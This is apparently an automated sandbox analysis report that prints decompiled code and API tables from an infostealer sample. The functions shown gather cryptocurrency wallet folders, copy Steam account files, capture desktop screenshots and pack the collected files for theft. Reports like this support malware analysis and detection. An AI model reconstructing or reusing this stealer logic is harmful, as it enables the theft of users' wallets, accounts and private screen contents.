							_t460 = _t459 + 0xc;
							lstrcatA( &_v288, "\\");
							lstrcatA( &_v288, "W");
							lstrcatA( &_v288, "a");
							lstrcatA( &_v288, "l");
							lstrcatA( &_v288, "l");
							lstrcatA( &_v288, "e");
							lstrcatA( &_v288, "t");
							lstrcatA( &_v288, "s");
							lstrcatA( &_v288, "\\");
							_t291 = _a40;
							if(_a60 < 0x10) {
								_t291 =  &_a40;
							}
							_t417 =  &_v288;
							lstrcatA( &_v288, _t291);
							lstrcatA( &_v288, "\\");
							_t296 = E29DA48F0( &_v1456,  &_v1316,  &_v288);
							_v8 = 0x12;
							if(_t296[0x14] >= 0x10) {
								_t296 =  *_t296;
							}
							lstrcatA( &_v288, _t296);
							_v8 = 0xe;
							if(_v1296 >= 0x10) {
								_t417 = _v1316;
								_push(_v1316);
								E29DADF3B();
								_t460 = _t460 + 4;
							}
							_t299 = E29DA48F0( &_v1456,  &_v1428, _t417);
							_t418 =  &_v1344;
							_v8 = 0x13;
							_t301 = E29D97CC0( &_v1344,  &_v1372,  &_a12);
							_v8 = 0x14;
							_t304 = E29D89980(_t299, _t301,  &_v1316);
							_t462 = _t460 + 0x10;
							_v8 = 0x15;
							if(_t304[0x14] >= 0x10) {
								_t304 =  *_t304;
							}
							_t437 = CreateFileA(_t304, 0x80000000, 3, 0, 3, 0x80, 0);
							if(_t437 != 0xffffffff) {
								 *0x29dd836c(_t437,  &_v1632);
								CloseHandle(_t437);
							}
							if(_v1296 >= 0x10) {
								_t418 = _v1316;
								_push(_v1316);
								E29DADF3B();
								_t462 = _t462 + 4;
							}
							_v1296 = 0xf;
							_v1300 = 0;
							_v1316 = 0;
							if(_v1324 >= 0x10) {
								_push(_v1344);
								E29DADF3B();
								_t462 = _t462 + 4;
							}
							_v8 = 0xe;
							_v1324 = 0xf;
							_v1328 = 0;
							_v1344 = 0;
							if(_v1408 >= 0x10) {
								_push(_v1428);
								E29DADF3B();
								_t462 = _t462 + 4;
							}
							_t307 = E29DA48F0( &_v1456,  &_v1428, _t418);
							_v8 = 0x16;
							_t309 = E29D97CC0( &_v1344,  &_v1372,  &_a12);
							_t408 =  &_v1316;
							_v8 = 0x17;
							_t311 = E29D89980(_t307, _t309,  &_v1316);
							_t454 = _t462 + 0x10;
							_v8 = 0x18;
							if( *((intOrPtr*)(_t311 + 0x14)) >= 0x10) {
								_t311 =  *_t311;
							}
							_t390 =  *((intOrPtr*)(_v1604 + 0x20));
							if(_t390 != 0) {
								__eflags =  *_t390 - 2;
								if( *_t390 == 2) {
									_t408 = _t311;
									 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t390 + 4)), _t311,  &_v288, 0, 2);
								} else {
									 *0x29dd8814 = 0x80000;
								}
							} else {
								 *0x29dd8814 = 0x10000;
							}
							if(_v1296 >= 0x10) {
								_push(_v1316);
								E29DADF3B();
								_t454 = _t454 + 4;
							}
							_v1296 = 0xf;
							_v1300 = 0;
							_v1316 = 0;
							if(_v1324 >= 0x10) {
								_push(_v1344);
								E29DADF3B();
								_t454 = _t454 + 4;
							}
							_v1324 = 0xf;
							_v1328 = 0;
							_v1344 = 0;
							if(_v1408 >= 0x10) {
								_t408 = _v1428;
								_push(_v1428);
								E29DADF3B();
								_t454 = _t454 + 4;
							}
							if(_v1380 >= 0x10) {
								_push(_v1400);
								E29DADF3B();
								_t454 = _t454 + 4;
							}
							_v8 = 6;
							if(_v1436 >= 8) {
								_push(_v1456);
								E29DADF3B();
								_t454 = _t454 + 4;
							}
							_t314 =  &(_v1600[0x1c]);
							_t351 = 0;
							_v1600 = _t314;
						} while (_t314 != _v1608);
						_t368 = _v1620;
						_t248 = _v1624;
						goto L71;
					}
				}
				_t345 =  *0x29dd8500(0, 0x1c);
				_t407 = (_t345 < 0x00000000) - 0x00000001 &  &_v1288;
				_t347 = (_t345 < 0x00000000) - 0x00000001 &  &_v1288;
				_t16 = _t347 + 1; // 0x0
				_t442 = _t16;
				do {
					_t402 =  *_t347;
					_t347 = _t347 + 1;
					_t467 = _t402;
				} while (_t402 != 0);
				goto L6;
			}




































































































                                        0x29d958a3
                                        0x29d958a5
                                        0x29d958b0
                                        0x29d958b7
                                        0x29d958bc
                                        0x29d958be
                                        0x29d958c4
                                        0x29d958c8
                                        0x29d958d1
                                        0x29d958d9
                                        0x29d958dc
                                        0x29d958e6
                                        0x29d958ec
                                        0x29d958ff
                                        0x29d95903
                                        0x29d95908
                                        0x29d95911
                                        0x29d95912
                                        0x29d95913
                                        0x29d95917
                                        0x29d95943
                                        0x29d9594b
                                        0x29d95957
                                        0x29d95957
                                        0x29d95959
                                        0x29d9595b
                                        0x29d9595b
                                        0x29d95960
                                        0x29d95960
                                        0x29d95962
                                        0x29d95963
                                        0x29d95963
                                        0x29d95967
                                        0x29d95971
                                        0x29d9597a
                                        0x29d95988
                                        0x29d9598f
                                        0x29d95992
                                        0x29d9599b
                                        0x29d959a1
                                        0x29d959ac
                                        0x29d959b1
                                        0x29d959bc
                                        0x29d959c4
                                        0x29d959c5
                                        0x29d959ca
                                        0x29d959ca
                                        0x29d959cd
                                        0x29d959d3
                                        0x29d959d9
                                        0x29d959db
                                        0x29d959e5
                                        0x29d959eb
                                        0x29d959f1
                                        0x29d959f7
                                        0x29d959ff
                                        0x29d96062
                                        0x29d96064
                                        0x29d960a6
                                        0x29d960ad
                                        0x29d960b3
                                        0x29d960b9
                                        0x29d960bf
                                        0x29d960c7
                                        0x29d960c8
                                        0x29d960cd
                                        0x29d960cd
                                        0x29d960d4
                                        0x29d960de
                                        0x29d960e4
                                        0x29d960ea
                                        0x29d960ec
                                        0x29d960ef
                                        0x29d960f0
                                        0x29d960f5
                                        0x29d960f5
                                        0x29d960fc
                                        0x29d96103
                                        0x29d96106
                                        0x29d96109
                                        0x29d9610e
                                        0x29d9610f
                                        0x29d96114
                                        0x29d96114
                                        0x29d9611b
                                        0x29d96122
                                        0x29d96125
                                        0x29d96128
                                        0x29d9612d
                                        0x29d9612e
                                        0x29d96133
                                        0x29d9613b
                                        0x29d96143
                                        0x29d96144
                                        0x29d96145
                                        0x29d96153
                                        0x29d96153
                                        0x29d96066
                                        0x29d96068
                                        0x29d9606c
                                        0x29d9609d
                                        0x29d9609d
                                        0x29d9609e
                                        0x29d960a3
                                        0x00000000
                                        0x29d960a3
                                        0x29d96070
                                        0x29d96074
                                        0x29d96076
                                        0x29d96078
                                        0x29d96079
                                        0x29d9607e
                                        0x29d9607e
                                        0x29d96083
                                        0x29d9608a
                                        0x29d9608d
                                        0x29d96090
                                        0x29d96093
                                        0x29d96097
                                        0x00000000
                                        0x29d95a05
                                        0x29d95a05
                                        0x29d95a18
                                        0x29d95a22
                                        0x29d95a28
                                        0x29d95a2f
                                        0x29d95a3c
                                        0x29d95a40
                                        0x29d95a59
                                        0x29d95a5d
                                        0x29d95a67
                                        0x29d95a70
                                        0x29d95a74
                                        0x29d95a79
                                        0x29d95a7c
                                        0x29d95a8b
                                        0x29d95a91
                                        0x29d95a97
                                        0x29d95a9f
                                        0x29d95aa1
                                        0x29d95aa7
                                        0x29d95aad
                                        0x29d95ab7
                                        0x29d95ad0
                                        0x29d95ad2
                                        0x29d95ad8
                                        0x29d95ab9
                                        0x29d95ac6
                                        0x29d95acb
                                        0x29d95acb
                                        0x29d95add
                                        0x29d95ae6
                                        0x29d95aec
                                        0x29d95aef
                                        0x29d95aef
                                        0x29d95afd
                                        0x29d95aff
                                        0x29d95b05
                                        0x29d95b06
                                        0x29d95b0b
                                        0x29d95b0b
                                        0x29d95b0e
                                        0x29d95b14
                                        0x29d95b1a
                                        0x29d95b26
                                        0x29d95b2e
                                        0x29d95b2f
                                        0x29d95b34
                                        0x29d95b34
                                        0x29d95b37
                                        0x29d95b3d
                                        0x29d95b43
                                        0x29d95b49
                                        0x29d95b53
                                        0x29d95b5b
                                        0x29d95b5c
                                        0x29d95b61
                                        0x29d95b61
                                        0x29d95b64
                                        0x29d95b6a
                                        0x29d95b7c
                                        0x29d95b82
                                        0x29d95b9b
                                        0x29d95b9f
                                        0x29d95bb2
                                        0x29d95bb6
                                        0x29d95bbb
                                        0x29d95bc5
                                        0x29d95bc9
                                        0x29d95bd6
                                        0x29d95bd8
                                        0x29d95bd8
                                        0x29d95bdb
                                        0x29d95be4
                                        0x29d95bf3
                                        0x29d95bf5
                                        0x29d95bf5
                                        0x29d95bea
                                        0x29d95bea
                                        0x29d95bef
                                        0x29d95bef
                                        0x29d95bfd
                                        0x29d95c05
                                        0x29d95c06
                                        0x29d95c0b
                                        0x29d95c0b
                                        0x29d95c17
                                        0x29d95c21
                                        0x29d95c27
                                        0x29d95c2e
                                        0x29d95c36
                                        0x29d95c37
                                        0x29d95c3c
                                        0x29d95c3c
                                        0x29d95c4b
                                        0x29d95c51
                                        0x29d95c57
                                        0x29d95c5d
                                        0x29d95c65
                                        0x29d95c66
                                        0x29d95c6b
                                        0x29d95c6b
                                        0x29d95c6e
                                        0x29d95c79
                                        0x29d95c7f
                                        0x29d95c85
                                        0x29d95c8b
                                        0x29d95c93
                                        0x29d95c94
                                        0x29d95c99
                                        0x29d95c99
                                        0x29d95c9c
                                        0x29d95ca2
                                        0x29d95ca8
                                        0x29d95cb0
                                        0x29d95cb2
                                        0x29d95cbd
                                        0x29d95cc3
                                        0x29d95cc9
                                        0x29d95cc9
                                        0x29d95cdc
                                        0x29d95ce1
                                        0x29d95cf0
                                        0x29d95d02
                                        0x29d95d14
                                        0x29d95d26
                                        0x29d95d38
                                        0x29d95d4a
                                        0x29d95d5c
                                        0x29d95d6e
                                        0x29d95d80
                                        0x29d95d8a
                                        0x29d95d8d
                                        0x29d95d8f
                                        0x29d95d8f
                                        0x29d95d93
                                        0x29d95d9a
                                        0x29d95dac
                                        0x29d95dbe
                                        0x29d95dc8
                                        0x29d95dcf
                                        0x29d95dd1
                                        0x29d95dd1
                                        0x29d95ddb
                                        0x29d95de1
                                        0x29d95deb
                                        0x29d95ded
                                        0x29d95df3
                                        0x29d95df4
                                        0x29d95df9
                                        0x29d95df9
                                        0x29d95e08
                                        0x29d95e1a
                                        0x29d95e21
                                        0x29d95e25
                                        0x29d95e38
                                        0x29d95e3c
                                        0x29d95e41
                                        0x29d95e49
                                        0x29d95e50
                                        0x29d95e52
                                        0x29d95e52
                                        0x29d95e6d
                                        0x29d95e72
                                        0x29d95e7c
                                        0x29d95e83
                                        0x29d95e83
                                        0x29d95e8f
                                        0x29d95e91
                                        0x29d95e97
                                        0x29d95e98
                                        0x29d95e9d
                                        0x29d95e9d
                                        0x29d95ea5
                                        0x29d95eab
                                        0x29d95eb1
                                        0x29d95ebd
                                        0x29d95ec5
                                        0x29d95ec6
                                        0x29d95ecb
                                        0x29d95ecb
                                        0x29d95ece
                                        0x29d95ed2
                                        0x29d95ed8
                                        0x29d95ede
                                        0x29d95eea
                                        0x29d95ef2
                                        0x29d95ef3
                                        0x29d95ef8
                                        0x29d95ef8
                                        0x29d95f07
                                        0x29d95f20
                                        0x29d95f24
                                        0x29d95f2e
                                        0x29d95f37
                                        0x29d95f3b
                                        0x29d95f40
                                        0x29d95f48
                                        0x29d95f4f
                                        0x29d95f51
                                        0x29d95f51
                                        0x29d95f59
                                        0x29d95f60
                                        0x29d95f6e
                                        0x29d95f71
                                        0x29d95f8c
                                        0x29d95f93
                                        0x29d95f73
                                        0x29d95f73
                                        0x29d95f73
                                        0x29d95f62
                                        0x29d95f62
                                        0x29d95f62
                                        0x29d95f9e
                                        0x29d95fa6
                                        0x29d95fa7
                                        0x29d95fac
                                        0x29d95fac
                                        0x29d95fb4
                                        0x29d95fba
                                        0x29d95fc0
                                        0x29d95fcc
                                        0x29d95fd4
                                        0x29d95fd5
                                        0x29d95fda
                                        0x29d95fda
                                        0x29d95fdd
                                        0x29d95fe3
                                        0x29d95fe9
                                        0x29d95ff5
                                        0x29d95ff7
                                        0x29d95ffd
                                        0x29d95ffe
                                        0x29d96003
                                        0x29d96003
                                        0x29d9600c
                                        0x29d96014
                                        0x29d96015
                                        0x29d9601a
                                        0x29d9601a
                                        0x29d9601d
                                        0x29d96028
                                        0x29d96030
                                        0x29d96031
                                        0x29d96036
                                        0x29d96036
                                        0x29d9603f
                                        0x29d96042
                                        0x29d96044
                                        0x29d9604a
                                        0x29d96056
                                        0x29d9605c
                                        0x00000000
                                        0x29d9605c
                                        0x29d959ff
                                        0x29d9591c
                                        0x29d95930
                                        0x29d95932
                                        0x29d95934
                                        0x29d95934
                                        0x29d95937
                                        0x29d95937
                                        0x29d95939
                                        0x29d9593a
                                        0x29d9593a
                                        0x00000000

                                        APIs
                                        • _memset.LIBCMT ref: 29D95903
                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 29D9591C
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D95943
                                        • _memmove.LIBCMT ref: 29D95AC6
                                        • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 29D95BDB
                                        • _memset.LIBCMT ref: 29D95CDC
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95CF0
                                        • lstrcatA.KERNEL32(?,29DCFD20,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D02
                                        • lstrcatA.KERNEL32(?,29DCFD24,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D14
                                        • lstrcatA.KERNEL32(?,29DCFD28,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D26
                                        • lstrcatA.KERNEL32(?,29DCFD28,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D38
                                        • lstrcatA.KERNEL32(?,29DCFD2C,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D4A
                                        • lstrcatA.KERNEL32(?,29DCFD30,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D5C
                                        • lstrcatA.KERNEL32(?,29DCFD34,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D6E
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D80
                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95D9A
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95DAC
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95DDB
                                        • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 29D95E67
                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 29D95E7C
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 29D95E83
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$FolderPath_memset$AttributesCloseCreateHandleSize_memmove
                                        • String ID:
                                        • API String ID: 987438778-0
                                        • Opcode ID: c03a9fcff50a90992b02e1cbab615481bed6120979d61e1d7fde374d552b9bd6
                                        • Instruction ID: 64f57320a12b24b14d9a6abe91a6f5b70960d0bb64cf702c967632000ca97b6e
                                        • Opcode Fuzzy Hash: c03a9fcff50a90992b02e1cbab615481bed6120979d61e1d7fde374d552b9bd6
                                        • Instruction Fuzzy Hash: BD42CDB1C106989FDB20DF68CC80BDEB7B5AF59301F0486EDE509A3241EB359A85DF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA50A0 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 140windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 29DA50FD
                                        • GetWindowRect.USER32(00000000,?), ref: 29DA510A
                                        • GetDC.USER32(00000000), ref: 29DA5111
                                        • CreateCompatibleDC.GDI32(00000000), ref: 29DA511A
                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 29DA512B
                                        • SelectObject.GDI32(00000000,00000000), ref: 29DA5136
                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 29DA5156
                                        • GlobalFix.KERNEL32(?), ref: 29DA51B3
                                        • GlobalSize.KERNEL32(?), ref: 29DA51C0
                                        • SelectObject.GDI32(00000000,?), ref: 29DA51E0
                                        • DeleteObject.GDI32(?), ref: 29DA51FE
                                        • DeleteObject.GDI32(00000000), ref: 29DA5205
                                        • ReleaseDC.USER32(00000000,00000000), ref: 29DA520D
                                        • CloseWindow.USER32(00000000), ref: 29DA5214
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSize
                                        • String ID: P5Ts$\screenshot.jpg
                                        • API String ID: 527014841-2297798693
                                        • Opcode ID: 9cf46837e2fea2faa88ebba03a7ccbae74a792b00cfd41d6ea8a3d414f396a52
                                        • Instruction ID: df8050272bbc8a4900883e3d4326759eb3bc6ebd9ef56d2fc43c2fb118106785
                                        • Opcode Fuzzy Hash: 9cf46837e2fea2faa88ebba03a7ccbae74a792b00cfd41d6ea8a3d414f396a52
                                        • Instruction Fuzzy Hash: D941DEB6950248AFDB05EFE4DC89EAEB7B9FF48B01F108519F905E3240D738A9059B70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D93B60 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 102stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 65%
                                        			E29D93B60(void* __ebx, CHAR* __esi, intOrPtr _a4) {
				signed int _v12;
				char _v280;
				char _v544;
				char _v808;
				struct _WIN32_FIND_DATAA _v1128;
				void* __edi;
				signed int _t22;
				intOrPtr* _t44;
				void* _t46;
				void* _t59;
				CHAR* _t60;
				signed int _t61;
				void* _t62;
				void* _t63;

				_t60 = __esi;
				_t46 = __ebx;
				_t22 =  *0x29dd5664; // 0xd9555f04
				_v12 = _t22 ^ _t61;
				wsprintfA( &_v808, "%s\\%s", __esi, _a4);
				_t63 = _t62 + 0x10;
				_t55 =  &_v808;
				_t59 = FindFirstFileA( &_v808,  &_v1128);
				if(_t59 == 0xffffffff) {
					L11:
					return E29DADF46(_t27, _t46, _v12 ^ _t61, _t55, _t59, _t60);
				} else {
					do {
						_push(".");
						_push( &(_v1128.cFileName));
						if( *0x29dd8550() != 0) {
							_push("..");
							_push( &(_v1128.cFileName));
							if( *0x29dd8550() != 0) {
								E29DB5640( &_v544, 0, 0x104);
								E29DB5640( &_v280, 0, 0x104);
								_t63 = _t63 + 0x18;
								lstrcatA( &_v544, "\\Soft\\Steam\\");
								lstrcatA( &_v544,  &(_v1128.cFileName));
								lstrcatA( &_v280, _t60);
								_t55 =  &_v280;
								lstrcatA( &_v280, "\\");
								lstrcatA( &_v280,  &(_v1128.cFileName));
								_t44 =  *0x29dd82ec; // 0x0
								if(_t44 != 0) {
									if( *_t44 == 2) {
										_t55 =  &_v280;
										 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t44 + 4)),  &_v280,  &_v544, 0, 2);
									} else {
										 *0x29dd8814 = 0x80000;
									}
								} else {
									 *0x29dd8814 = 0x10000;
								}
							}
						}
					} while (FindNextFileA(_t59,  &_v1128) != 0);
					_t27 = FindClose(_t59);
					goto L11;
				}
			}

















                                        0x29d93b60
                                        0x29d93b60
                                        0x29d93b69
                                        0x29d93b70
                                        0x29d93b85
                                        0x29d93b8b
                                        0x29d93b95
                                        0x29d93ba2
                                        0x29d93ba7
                                        0x29d93ccb
                                        0x29d93cd9
                                        0x29d93bb0
                                        0x29d93bb0
                                        0x29d93bb0
                                        0x29d93bbb
                                        0x29d93bc4
                                        0x29d93bca
                                        0x29d93bd5
                                        0x29d93bde
                                        0x29d93bf2
                                        0x29d93c08
                                        0x29d93c0d
                                        0x29d93c1c
                                        0x29d93c30
                                        0x29d93c3e
                                        0x29d93c49
                                        0x29d93c50
                                        0x29d93c64
                                        0x29d93c6a
                                        0x29d93c71
                                        0x29d93c82
                                        0x29d93c9e
                                        0x29d93ca9
                                        0x29d93c84
                                        0x29d93c84
                                        0x29d93c84
                                        0x29d93c73
                                        0x29d93c73
                                        0x29d93c73
                                        0x29d93c71
                                        0x29d93bde
                                        0x29d93cbc
                                        0x29d93cc5
                                        0x00000000
                                        0x29d93cc5

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File_memset$CloseFirstNextwsprintf
                                        • String ID: %s\%s$\Soft\Steam\
                                        • API String ID: 2894742787-2995071678
                                        • Opcode ID: 3b58b005f005f4742c55ef2d6fdb3a3369816000dd75f323c5bc5931b6cfee58
                                        • Instruction ID: a54d0fca7f26e443a9756d7a76e61d476238c634107b42321dbc492c25ca62f3
                                        • Opcode Fuzzy Hash: 3b58b005f005f4742c55ef2d6fdb3a3369816000dd75f323c5bc5931b6cfee58
                                        • Instruction Fuzzy Hash: A8417EB2540218ABC715EBA0DD89FDAB7B8AB58B00F40859DE605D7040EB349649EF71
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DAC840 Relevance: 23.4, APIs: 11, Strings: 2, Instructions: 646COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 78%
                                        			E29DAC840(signed int* __ecx, signed int __edx, intOrPtr _a4, signed int _a8, char* _a12) {
				signed int _v12;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				signed int _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v32;
				char _v33;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v54;
				char _v56;
				char _v320;
				signed int _v324;
				signed int _v328;
				char _v336;
				char _v596;
				char _v856;
				signed int _v860;
				char* _v864;
				char* _v868;
				char _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				short _v1140;
				short _v1142;
				short _v1144;
				signed int _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				int _v1160;
				char* _v1164;
				signed int _v1168;
				signed int _v1172;
				unsigned int _v1176;
				short _v1178;
				signed int _v1180;
				char _v1184;
				signed int _v1188;
				signed int _v1189;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				void* _v1208;
				signed int* _v1212;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t297;
				intOrPtr _t299;
				char* _t304;
				intOrPtr _t305;
				int _t310;
				short _t314;
				short _t315;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t326;
				int _t327;
				signed int _t332;
				signed int _t334;
				signed int _t341;
				signed char _t344;
				unsigned int _t348;
				unsigned int _t351;
				char _t355;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				intOrPtr _t362;
				void* _t365;
				void* _t366;
				signed int _t378;
				signed int _t380;
				void* _t381;
				signed int _t383;
				signed int _t388;
				intOrPtr _t396;
				signed int _t400;
				intOrPtr* _t401;
				void* _t402;
				signed int _t408;
				signed int _t412;
				signed char _t421;
				signed char _t427;
				signed char _t436;
				signed int _t457;
				intOrPtr _t458;
				unsigned int _t461;
				unsigned int _t466;
				signed int _t475;
				signed int _t478;
				signed int _t485;
				signed int _t501;
				signed int _t546;
				void* _t562;
				unsigned int _t569;
				signed int _t574;
				signed int _t576;
				void* _t582;
				signed int _t589;
				signed int _t590;
				signed int _t591;
				signed char* _t593;
				intOrPtr _t594;
				void* _t595;
				signed int _t598;
				void* _t599;

				_t506 = __edx;
				_t297 =  *0x29dd5664; // 0xd9555f04
				_v12 = _t297 ^ _t598;
				_t299 = _a4;
				_t407 = __ecx;
				_t552 = _a12;
				_v1212 = __ecx;
				_t587 = __edx;
				if(__ecx[5] == 0) {
					__eflags = __ecx[0xb];
					if(__ecx[0xb] == 0) {
						__eflags =  *__ecx;
						_v1208 = 0;
						if( *__ecx != 0) {
							__eflags = _t552 - 4;
							if(_t552 != 4) {
								_v1208 = 0xc;
							}
						}
						 *0x29dd85cc( &_v320, _t299);
						__eflags = _v320;
						if(_v320 == 0) {
							L91:
							_t302 = 0x10000;
							goto L92;
						} else {
							_t304 =  &_v320;
							do {
								__eflags =  *_t304 - 0x5c;
								if( *_t304 == 0x5c) {
									 *_t304 = 0x2f;
								}
								_t304 = _t304 + 1;
								__eflags =  *_t304;
							} while ( *_t304 != 0);
							__eflags = _t552 - 4;
							_t506 = _t506 & 0xffffff00 | _t552 == 0x00000004;
							_v1189 = _t506;
							__eflags = _t506;
							if(_t506 == 0) {
								L16:
								_v1188 = 0;
							} else {
								_t401 =  &_v320;
								_t18 = _t401 + 1; // 0x1
								_t552 = _t18;
								do {
									_t501 =  *_t401;
									_t401 = _t401 + 1;
									__eflags = _t501;
								} while (_t501 != 0);
								_t402 = _t401 - _t552;
								__eflags =  *((char*)(_t598 + _t402 - 0x13d)) - 0x2f;
								_v1188 = 1;
								if( *((char*)(_t598 + _t402 - 0x13d)) == 0x2f) {
									goto L16;
								}
							}
							_v1204 = 8;
							__eflags = _t506;
							if(_t506 != 0) {
								L19:
								_v1204 = 0;
							} else {
								_t552 =  &_v320;
								_t400 = E29DABB50( &_v320);
								__eflags = _t400;
								if(_t400 != 0) {
									goto L19;
								}
							}
							_t305 = _a12;
							__eflags = _t305 - 2;
							if(_t305 != 2) {
								__eflags = _t305 - 1;
								if(_t305 != 1) {
									__eflags = _t305 - 3;
									if(_t305 != 3) {
										__eflags = _t305 - 4;
										if(_t305 != 4) {
											goto L91;
										} else {
											_t302 = E29DAC4A0(_t552, _t407);
											goto L28;
										}
									} else {
										_t506 = _a8;
										_t302 = E29DAC370(_t587, _t552, _t407, _a8);
										goto L28;
									}
								} else {
									_t302 = E29DAC210(_t407, _t587, _a8);
									goto L28;
								}
							} else {
								_t302 = E29DAC190(_t587, _t407);
								L28:
								_t587 = 0;
								__eflags = _t302;
								if(_t302 != 0) {
									L92:
									__eflags = _v12 ^ _t598;
									return E29DADF46(_t302, _t407, _v12 ^ _t598, _t506, _t552, _t587);
								} else {
									_v324 = 0;
									 *0x29dd85cc( &_v1128, 0x29dcd617);
									 *0x29dd85cc( &_v856,  &_v320);
									_t310 = lstrlenA( &_v856);
									__eflags = _v1188;
									_v1160 = _t310;
									if(_v1188 != 0) {
										lstrcatA( &_v856, "/");
										_t37 =  &_v1160;
										 *_t37 = _v1160 + 1;
										__eflags =  *_t37;
									}
									 *0x29dd85cc( &_v596, 0x29dcd617);
									_v1142 = 0;
									_v1176 =  *((intOrPtr*)(_t407 + 0x68));
									_t314 = 8;
									_v860 = _t587;
									_v1148 = _t587;
									_v336 = 1;
									_v328 = _t587;
									_v1184 = 0x140b17;
									_v1172 = _t587;
									_v1180 = 8;
									__eflags =  *_t407 - _t587;
									if( *_t407 != _t587) {
										__eflags = _v1189;
										if(_v1189 == 0) {
											_t314 = 9;
											_v1180 = 9;
										}
									}
									_v1140 = _t314;
									_t315 = _v1204;
									_v1178 = _t315;
									__eflags = _t315 - _t587;
									if(__eflags != 0) {
										L37:
										_v1168 = _t587;
									} else {
										_t396 =  *((intOrPtr*)(_t407 + 0x70));
										__eflags = _t396 - _t587;
										if(__eflags < 0) {
											goto L37;
										} else {
											_v1168 = _t396 + _v1208;
										}
									}
									_t589 =  *(_t407 + 0x58);
									_v1164 =  *((intOrPtr*)(_t407 + 0x70));
									_v1132 =  *(_t407 + 0x18) +  *((intOrPtr*)(_t407 + 0x10));
									_v27 =  *(_t407 + 0x58) & 0x000000ff;
									_v1144 = 0;
									_v1136 =  *((intOrPtr*)(_t407 + 0x4c));
									_v868 =  &_v32;
									_t318 =  *(_t407 + 0x5c);
									_v864 =  &_v56;
									_v26 = (_t318 << 0x00000020 | _t589) >> 8;
									_v23 =  *(_t407 + 0x50) & 0x000000ff;
									_v25 = (_t318 << 0x00000020 | _t589) >> 0x10;
									_t590 =  *(_t407 + 0x50);
									_t457 = (_t318 << 0x00000020 | _t589) >> 0x18;
									_t320 =  *(_t407 + 0x54);
									_v22 = (_t320 << 0x00000020 | _t590) >> 8;
									_v21 = (_t320 << 0x00000020 | _t590) >> 0x10;
									_t591 =  *(_t407 + 0x60);
									_v20 = (_t320 << 0x00000020 | _t590) >> 0x18;
									_v19 =  *(_t407 + 0x60);
									_t323 =  *(_t407 + 0x64);
									_v18 = (_t323 << 0x00000020 | _t591) >> 8;
									_v17 = (_t323 << 0x00000020 | _t591) >> 0x10;
									_v32 = 0xd5455;
									_t127 =  &_v32; // 0xd5455
									_v28 = 7;
									_v16 = (_t323 << 0x00000020 | _t591) >> 0x18;
									_v56 =  *_t127;
									_t592 = _t407;
									_v1156 = 0x11;
									_v1152 = 9;
									_v24 = _t457;
									_v52 = _v28;
									_v48 = _t457;
									_v54 = 5;
									_t326 = E29DAB070(_t457,  &_v1184, _t407, __eflags);
									__eflags = _t326;
